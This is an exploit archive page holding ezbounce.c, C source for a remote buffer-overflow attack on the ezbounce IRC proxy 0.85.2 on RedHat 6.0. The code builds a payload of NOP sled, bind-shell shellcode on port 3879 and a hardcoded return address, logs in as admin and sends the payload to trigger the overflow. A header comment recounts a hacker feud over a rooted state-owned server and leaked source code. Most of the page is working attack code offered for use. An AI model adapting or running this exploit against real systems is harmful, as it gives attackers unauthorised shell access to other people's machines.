exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

ezbounce.c

ezbounce.c
Posted Sep 29, 2000
Authored by Sectorx

Ezbounce version (0.85.2 and probably others) remote overflow exploit for RedHat 6.0.

tags | exploit, remote, overflow
systems | linux, redhat
SHA-256 | 5308ae9853de5798deb77486bbb195cef485649413d9843a76a889824464594f

ezbounce.c

Change Mirror Download
/* ezbounce version (0.85.2 and probably others) exploit by sectorx
* mad thanks to duke for helping me with the segment probe code :)
* I included the offset of RedHat 6.0's RPM, feel free to report me of
* any other offsets of precompiled binaries.
*
* PRIVATE! DO NOT DISTRIBUTE!!
*
* ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
* This source code was supposed to be PRIVATE PROPERTY of XOR,
* though it was set public, WITHOUT OUR PERMISSION, by gov-boi,
* the owner of hack.co.za. This once again proves Phonic's claims
* about gov-boi.
*
*
* "The Source Code Thief Reveled" --Phonic :
* ------------------------------------------
*
* Welcome to the new www.hack.co.za
*
* My name is phonic. you might have heard of me.
*
* Part I
* ----------
* You might have noticed that recently a file was added called the Cisco
* Auditing Tool. This tool was a pretty nice all-in-one Cisco Router tool
* coded by g0ne. I was helping him work on this tool, and I happened to
* have a local copy of it on the machine I admin: Station 25. I might also
* add that this is a state owned box. Well, as we were working on this tool,
* we were getting it ready for release. Working out a few bugs, adding some
* new tools, etc. So I had the latest version of the source in a private
* directory on my box. Also, I had a large collection of un-released source
* code.
*
* Part II
* ----------
* About a month or so ago, I was asked by a friend, whose name will remain
* confidential, if I would mind hosting www.hack.co.za for gov-boi, aka
* rage. Apparently, the previous hoster stopped hosting it for reasons
* unknown to me, so the site was down for a while. I, being the kind and
* generous person that I am so well known to be =], said ok. So for the past
* month or so, www.hack.co.za was being hosted here. I helped gov-boi setup
* the dns tables, etc. so that the site would work and everyone would be
* happy.
*
* Part III
* ----------
* Like I said earlier, the pre-release source code for the Cisco Auditing
* Tool was on this box. On the night of May 25th 2000, I get a phone call
* from g0ne. Apparently, someone had posted the source code to packet storm.
* Well, this was strange because only 3 people, myself and g0ne included,
* had the source. I didn't think anyone on my box would have taken it since
* I thought they were all trustworthy. It turned out I was sadly mistaken.
* After careful examination of the box, I learned that gov-boi rooted the
* box, the box I was generous enough to let him use, with a local exploit.
* Not hiding his work at all, this was easily found out in the logs.
*
* Part IV
* ----------
* gov-boi decided that in exchange for the generosity that I extended
* towards him, with nothing asked for in return, he was going to go behind
* my back, and steal tons of source code for his web site. I imagine he is
* going to quickly change the dns tables to unlink this server from
* www.hack.co.za once he realizes that I found out that he is a source code
* thief. Now, in my humble opinion, and I could be wrong, I think this is
* really fucked up.
*
* Part V
* ----------
* Finally, tomorrow I have to file a report about the intrusion and hack on this system by gov-boi.
* Oh, did I mention that this is a state owned box?
*
* Thank you for your time.
* -phonic
*
* --snip snip--
*
* Thanks for your time.
* --sectorx <sectorx@themarines.com>
*/
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <fcntl.h>
#include <stdarg.h>
#include <time.h>
#include <sys/time.h>

#define MAX 4096
#define TIMEOUT 1
#define SIZE 400
#define TOP 310
#define ADDR 0xbffff26c /* ezbounce 0.85.2 RedHat 6.0 RPM offset */

/* bind a shell on port 3879 by lamagra */
char shellcode[]=
"\x89\xe5\x31\xd2\xb2\x66\x89\xd0\x31\xc9\x89\xcb\x43\x89\x5d\xf8"
"\x43\x89\x5d\xf4\x4b\x89\x4d\xfc\x8d\x4d\xf4\xcd\x80\x31\xc9\x89"
"\x45\xf4\x43\x66\x89\x5d\xec\x66\xc7\x45\xee\x0f\x27\x89\x4d\xf0"
"\x8d\x45\xec\x89\x45\xf8\xc6\x45\xfc\x10\x89\xd0\x8d\x4d\xf4\xcd"
"\x80\x89\xd0\x43\x43\xcd\x80\x89\xd0\x43\xcd\x80\x89\xc3\x31\xc9"
"\xb2\x3f\x89\xd0\xcd\x80\x89\xd0\x41\xcd\x80\xeb\x18\x5e\x89\x75"
"\x08\x31\xc0\x88\x46\x07\x89\x45\x0c\xb0\x0b\x89\xf3\x8d\x4d\x08"
"\x8d\x55\x0c\xcd\x80\xe8\xe3\xff\xff\xff/bin/sh";

int Connect(int ip, int port)
{
int fd;
struct sockaddr_in a;

fd = socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);
if (fd<0) return -1;
a.sin_family = AF_INET;
a.sin_port = htons(port);
a.sin_addr.s_addr = ip;
if (connect(fd,(struct sockaddr*)&a,sizeof(struct sockaddr))<0) return -1;
return fd;
}

int sprint(int fd, const char *str, ...)
{
va_list args;
char buf[MAX];

va_start(args,str);
vsnprintf(buf,MAX,str,args);
printf("-> %s",buf);
return(write(fd,buf,strlen(buf)));
}

int Datawatch(int fd, int sec)
{
fd_set fds;
struct timeval tv;

tv.tv_sec = sec;
tv.tv_usec = 0;
FD_ZERO(&fds);
FD_SET(fd,&fds);
if (select(fd+1,&fds,NULL,NULL,&tv)) return 1;
return 0;
}

int Get(int fd, char *grep)
{
char buf[MAX];
int ret=0;

while (Datawatch(fd,TIMEOUT)>0) {
memset(&buf,0,sizeof(buf));
read(fd,&buf,sizeof(buf));
if (strstr(buf,grep)) ++ret;
}
return ret;
}

int main(int argc, char *argv[])
{
int i,fd;
char buf[SIZE];

printf("ezbounce remote exploit by sectorx of xor\n");
if (argc<6) {
printf("Usage: %s <ip> <port> <password> <admin username> <admin password>\n\n",argv[0]);
return;
}

memset(&buf,0x90,sizeof(buf));
for (i=TOP+2;i<SIZE-4;i+=4) *(long*)&buf[i] = ADDR;
memcpy(buf+(TOP-sizeof(shellcode)-1),shellcode,sizeof(shellcode));
buf[TOP-2] = 0x90;
buf[SIZE-1] = '\0';

fd = Connect(inet_addr(argv[1]),atoi(argv[2]));
if (fd<0) {
perror("Connect ");
return;
}
sprint(fd,"USER xor\n");
sprint(fd,"NICK %s\n",buf);
sprint(fd,"PASS %s\n",argv[3]);
Get(fd,"NOTICE");
sprint(fd,"ADMIN %s %s\n",argv[4],argv[5]);
if (Get(fd,"granted")==0) {
printf("** Error: i was unable to gain administrative privilages using provided l/p\naborting.\n");
goto end;
}
sprint(fd,"WRITE all a\n");
printf("Code sent! telnet to port 3879 for shell\n");
end: ;
close(fd);
}
Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    0 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close